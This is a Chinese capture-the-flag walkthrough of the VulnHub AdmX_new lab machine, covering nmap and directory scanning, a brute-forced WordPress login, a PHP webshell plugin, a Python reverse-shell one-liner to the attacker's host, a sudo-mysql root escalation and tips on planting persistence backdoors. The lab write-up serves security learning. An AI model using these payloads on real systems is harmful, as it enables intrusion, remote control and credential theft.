VulnHub-AdmX_new
本人所有文章均为技术分享,均用于防御为目的的记录,所有操作均在实验环境下进行,请勿用于其它用途,否则后果自负,作者不承担相应的后果。
靶机地址:https://download.vulnhub.com/admx/AdmX_new.7z
目标:取得 2 个 flag + root 权限
一、主机发现
使用nmap扫描192.168.11.0/24网段(nmap不如arp-scan速度快)可以知道192.168.11.135就是靶机的IP
nmap -sn 192.168.11.0/24 |grep 192.168.11 |awk '{print($5)}'
┌──(root㉿kali)-[~]
└─# nmap -sn 192.168.11.0/24 |grep 192.168.11 |awk '{print($5)}'
192.168.11.1
192.168.11.135
192.168.11.254
192.168.11.131
二、端口扫描
进行全端口发现目标靶机只开启了一个80端口
nmap -p- 192.168.11.135
┌──(root㉿kali)-[~]
└─# nmap -p- 192.168.11.135
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-13 08:12 CST
Nmap scan report for 192.168.11.135
Host is up (0.00069s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
MAC Address: 00:0C:29:81:91:C6 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 118.46 seconds
三、服务版本扫描
对80端口进行针对性扫描,可以看到80端口运行的是在Apache服务器上的http服务,目标系统是Ubuntu。
nmap -p80 -sV 192.168.11.135
┌──(root㉿kali)-[~]
└─# nmap -p80 -sV 192.168.11.135
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-13 08:17 CST
Nmap scan report for 192.168.11.135
Host is up (0.00041s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
MAC Address: 00:0C:29:81:91:C6 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.93 seconds
四、查看服务端口
查看目标网站http://192.168.11.135:80/没有任何发现。
五、目录扫描
1、feroxbuster扫描
使用feroxbuster爆破扫描靶机http服务网站路径
feroxbuster --url http://192.168.11.135/
-w # 指定字典(默认字典
/usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt)
┌──(root㉿kali)-[~]
└─# feroxbuster --url http://192.168.11.135/
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.7.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.11.135/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.7.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
2、WordPress访问异常
2.1 BurpSuite抓包分析
当访问http://192.168.11.135/wordpress/时,网站要调用192.168.159.145上的js文件来美化页面,但其实这两个ip指向的都是wordpress这个cms。
2.2 Match and Replace
因为访问192.168.11.135时服务器会通过响应包的形式返回192.168.159.145给客户端,所以需要将响应包中192.168.159.145这个ip替换为192.168.11.135即可快速访问页面。
2.3 访问查询到的目录
2.3.1 WP样品页面
2.3.2 WP后台登录页面
http://192.168.11.135/wordpress/wp-admin/ => http://192.168.11.135/wordpress/wp-login.php?redirect_to=http%3A%2F%2F192.168.11.135%2Fwordpress%2Fwp-admin%2F&reauth=1
六、密码爆破
通过页面测试得到用户名是admin
通过爆破得到密码是adam14
字典下载:
所用字典:MidPwds.txt
登录后台
用户名:admin
密码:adam14
七、Wordpress后台漏洞利用
-
media中可以进行文件上传
-
appearance(外观)中可以上传一句话木马
-
plugins(插件)上传插件时也可以进行一句话木马的上传
1、plugins中插入一句话木马
1.1 创建木马插件shell.php
<?php
/**
* Plugin Name: Shell
* Plugin URI: https://x.github.io
* Description: WP Webshell for Pentest
* Version: 1.0
* Author: kalpa
* Author URI: https://x.github.io
* License: https://x.github.io
*/
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
1.2 压缩成zip
zip shell.zip shell.php
┌──(root㉿kali)-[~/admx]
└─# zip shell.zip shell.php
adding: shell.php (deflated 33%)
┌──(root㉿kali)-[~/admx]
└─# ls
shell.php shell.zip
1.3 上传shell.zip
上传成功
1.4 验证shell.zip
进行靶机命令测试(which python3)
http://192.168.11.135/wordpress/wp-content/plugins/shell.php?cmd=which%20python3
2、NC反弹Shell
2.1 侦听6969端口
nc -lvnp 6969
2.2 利用Python3反弹
注:其它的反弹不成功,只有Python3可以
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.11.131",8989));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
2.3 拿到shell
┌──(root㉿kali)-[~]
└─# nc -lvnp 8989
listening on [any] 8989 ...
connect to [192.168.11.131] from (UNKNOWN) [192.168.11.135] 44338
www-data@wp:/var/www/html/wordpress$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@wp:/var/www/html/wordpress$
2.4 升级Full TTY终端
-
CTRL+Z
-
stty raw -echo
-
fg
-
ls
-
export SHELL=/bin/bash
-
export TERM=screen
-
stty rows 33 columns 145
-
reset
┌──(root㉿kali)-[~]
└─# nc -lvnp 8989
listening on [any] 8989 ...
connect to [192.168.11.131] from (UNKNOWN) [192.168.11.135] 44338
www-data@wp:/var/www/html/wordpress$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@wp:/var/www/html/wordpress$ ^Z
[1]+ 已停止 nc -lvnp 8989
┌──(root㉿kali)-[~]
└─# stty raw -echo
┌──(root㉿kali)-[~]
└─#
nc -lvnp 8989
ls
index.php wp-blog-header.php wp-cron.php wp-mail.php
license.txt wp-comments-post.php wp-includes wp-settings.php
readme.html wp-config-sample.php wp-links-opml.php wp-signup.php
wp-activate.php wp-config.php wp-load.php wp-trackback.php
wp-admin wp-content wp-login.php xmlrpc.php
www-data@wp:/var/www/html/wordpress$ export SHELL=/bin/bash
www-data@wp:/var/www/html/wordpress$ export TERM=screen
www-data@wp:/var/www/html/wordpress$ stty rows 33 columns 145
www-data@wp:/var/www/html/wordpress$ reset
www-data@wp:/var/www/html/wordpress$
注:可以写入一句话木马(蚁剑上线)等插入更多后门,实战中防止被查杀后丢失权限。
2.5 内网信息收集
在信息收集过程中找到了名为local.txt文件,但是只有wpadmin用户有权限查看。
www-data@wp:/var/www/html/wordpress$ ls -al
total 224
drwxr-x--- 5 www-data www-data 4096 May 8 2021 .
drwxr-xr-x 4 root root 4096 May 8 2021 ..
-rw-r----- 1 www-data www-data 543 May 11 2021 .htaccess
-rw-r----- 1 www-data www-data 405 Feb 6 2020 index.php
-rw-r----- 1 www-data www-data 19915 Jan 1 2021 license.txt
-rw-r----- 1 www-data www-data 7345 Dec 29 2020 readme.html
-rw-r----- 1 www-data www-data 7165 Jan 21 2021 wp-activate.php
drwxr-x--- 9 www-data www-data 4096 Apr 15 2021 wp-admin
-rw-r----- 1 www-data www-data 351 Feb 6 2020 wp-blog-header.php
-rw-r----- 1 www-data www-data 2328 Feb 17 2021 wp-comments-post.php
-rw-r----- 1 www-data www-data 2913 Feb 6 2020 wp-config-sample.php
-rw-r----- 1 www-data www-data 1160 May 8 2021 wp-config.php
drwxr-x--- 6 www-data www-data 4096 Apr 14 01:05 wp-content
-rw-r----- 1 www-data www-data 3939 Jul 30 2020 wp-cron.php
drwxr-x--- 25 www-data www-data 12288 Apr 15 2021 wp-includes
-rw-r----- 1 www-data www-data 2496 Feb 6 2020 wp-links-opml.php
-rw-r----- 1 www-data www-data 3313 Jan 10 2021 wp-load.php
-rw-r----- 1 www-data www-data 44994 Apr 4 2021 wp-login.php
-rw-r----- 1 www-data www-data 8509 Apr 14 2020 wp-mail.php
-rw-r----- 1 www-data www-data 21125 Feb 2 2021 wp-settings.php
-rw-r----- 1 www-data www-data 31328 Jan 27 2021 wp-signup.php
-rw-r----- 1 www-data www-data 4747 Oct 8 2020 wp-trackback.php
-rw-r----- 1 www-data www-data 3236 Jun 8 2020 xmlrpc.php
www-data@wp:/home/wpadmin$ cd /root/
bash: cd: /root/: Permission denied
www-data@wp:/var/www/html/wordpress$ cd /home/
www-data@wp:/home$ ls -al
total 12
drwxr-xr-x 3 root root 4096 May 8 2021 .
drwxr-xr-x 20 root root 4096 Feb 16 21:35 ..
drwxr-xr-x 3 wpadmin wpadmin 4096 May 11 2021 wpadmin
www-data@wp:/home$ cd wpadmin/
www-data@wp:/home/wpadmin$ ls -al
total 28
drwxr-xr-x 3 wpadmin wpadmin 4096 May 11 2021 .
drwxr-xr-x 3 root root 4096 May 8 2021 ..
lrwxrwxrwx 1 root root 9 May 8 2021 .bash_history -> /dev/null
-rw-r--r-- 1 wpadmin wpadmin 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 wpadmin wpadmin 3771 Feb 25 2020 .bashrc
drwx------ 2 wpadmin wpadmin 4096 May 11 2021 .cache
-rw-r--r-- 1 wpadmin wpadmin 807 Feb 25 2020 .profile
-r-------- 1 wpadmin wpadmin 33 May 8 2021 local.txt
www-data@wp:/home/wpadmin$ cat local.txt
cat: local.txt: Permission denied
八、密码复用
1、获取wpadmin用户shell
在信息收集过程中还发现了wordpress下的数据库配置文件wp-config.php,里面有用户名密码等。
www-data@wp:/var/www/html/wordpress$ cat wp-config.php
<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'admin' );
define( 'DB_PASSWORD', 'Wp_Admin#123' );
define( 'DB_HOST', 'localhost' );
define( 'DB_CHARSET', 'utf8mb4' );
define( 'DB_COLLATE', '' );
define( 'AUTH_KEY', '-=<%h-&zmo1#bWHqHEib?bJt!)mOL7E+j{x7x;Hsc}t?xm?=kRfunrRmTUP;#8OS' );
define( 'SECURE_AUTH_KEY', 'A5#uw+^B_f:K]WNq@aoXLpD@bmMD/hev^UAf,^lTCX3@a1&7A(qLFS_{I=pYw(ET' );
define( 'LOGGED_IN_KEY', '~*TFb3]y1^|G9j%?Z@F[63A+AAT<mndFo-H{q0P#Nz/qYN3da@UXyY6YP6`7QNmy' );
define( 'NONCE_KEY', 'bP88<WoD?9;eN0yM9A{+])!$(k[zp{:-.ZS6Fk*snlJN&GXU6Zy_)wEbqk>-? nn' );
define( 'AUTH_SALT', 'SX%VenTL%k&f%i8tFAhtf#svIc|nt.&t~R%zp=:n:Q%e0Ux?k,-j?ZAjZZ%;w1ih' );
define( 'SECURE_AUTH_SALT', '-e Z<w<q8F~Tm7IeNu2nSa^or=*B?bV*yRBa+4; My}cIJ]?L%j14RWghI,D^M^5' );
define( 'LOGGED_IN_SALT', '}Z}fYC%Mv;;ON/h~$c2c,u[FZ>`YaiscN6UY&HCcXUVl{miUbX4a/ LdJ^AoL/Z{' );
define( 'NONCE_SALT', 'BQPaC,#p}PEcU^eC*Hwss>9~UCEKhv]tox~PN)?B.kSn%tC)V~pZ6RpOBR>80o5+' );
$table_prefix = 'wp_';
define( 'WP_DEBUG', false );
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
require_once ABSPATH . 'wp-settings.php';www-data@wp:/var/www/html/wordpress$
网站管理员有可能会用相同的密码,利用已经获得密码去尝试登录wpadmin
su wpadmin
用已经获得的后台管理密码(adam14)登录成功,查看在/home/wpadmin/目录下的local.txt文件
www-data@wp:/var/www$ su wpadmin
Password:
wpadmin@wp:/var/www$ cd ~
wpadmin@wp:~$ ls -al
total 28
drwxr-xr-x 3 wpadmin wpadmin 4096 May 11 2021 .
drwxr-xr-x 3 root root 4096 May 8 2021 ..
lrwxrwxrwx 1 root root 9 May 8 2021 .bash_history -> /dev/null
-rw-r--r-- 1 wpadmin wpadmin 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 wpadmin wpadmin 3771 Feb 25 2020 .bashrc
drwx------ 2 wpadmin wpadmin 4096 May 11 2021 .cache
-r-------- 1 wpadmin wpadmin 33 May 8 2021 local.txt
-rw-r--r-- 1 wpadmin wpadmin 807 Feb 25 2020 .profile
wpadmin@wp:~$ cat local.txt
153495edec1b606c24947b1335998bd9
wpadmin@wp:~$
获得flag
153495edec1b606c24947b1335998bd9
2、利用MySQL提权
经过测试发现,没有root权限
wpadmin@wp:~$ sudo ls -al /root/
[sudo] password for wpadmin:
Sorry, user wpadmin is not allowed to execute '/usr/bin/ls -al /root/' as root on wp.
wpadmin@wp:~$ sudo -l
Matching Defaults entries for wpadmin on wp:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User wpadmin may run the following commands on wp:
(root) NOPASSWD: /usr/bin/mysql -u root -D wordpress -p
根据(root) NOPASSWD: /usr/bin/mysql -u root -D wordpress -p考虑使用MySQL提权
sudo /usr/bin/mysql -u root -D wordpress -p
! /bin/bash
wpadmin@wp:~$ sudo /usr/bin/mysql -u root -D wordpress -p
Enter password:
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 220
Server version: 10.3.25-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [wordpress]> system id
uid=0(root) gid=0(root) groups=0(root)
MariaDB [wordpress]> \! /bin/bash
root@wp:/home/wpadmin# id
uid=0(root) gid=0(root) groups=0(root)
至此已获取root权限,然后查找并获取第二个flag
root@wp:/home/wpadmin# cd /root/
root@wp:~# la -al
total 36
drwx------ 5 root root 4096 May 8 2021 .
drwxr-xr-x 20 root root 4096 Feb 16 21:35 ..
lrwxrwxrwx 1 root root 9 May 8 2021 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc
drwx------ 2 root root 4096 May 8 2021 .cache
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-r-------- 1 root root 33 May 8 2021 proof.txt
drwxr-xr-x 3 root root 4096 May 8 2021 snap
drwx------ 2 root root 4096 May 8 2021 .ssh
-rw-r--r-- 1 root root 227 May 8 2021 .wget-hsts
root@wp:~# cat proof.txt
7efd721c8bfff2937c66235f2d0dbac1
root@wp:~#
至此打靶完成,游戏结束
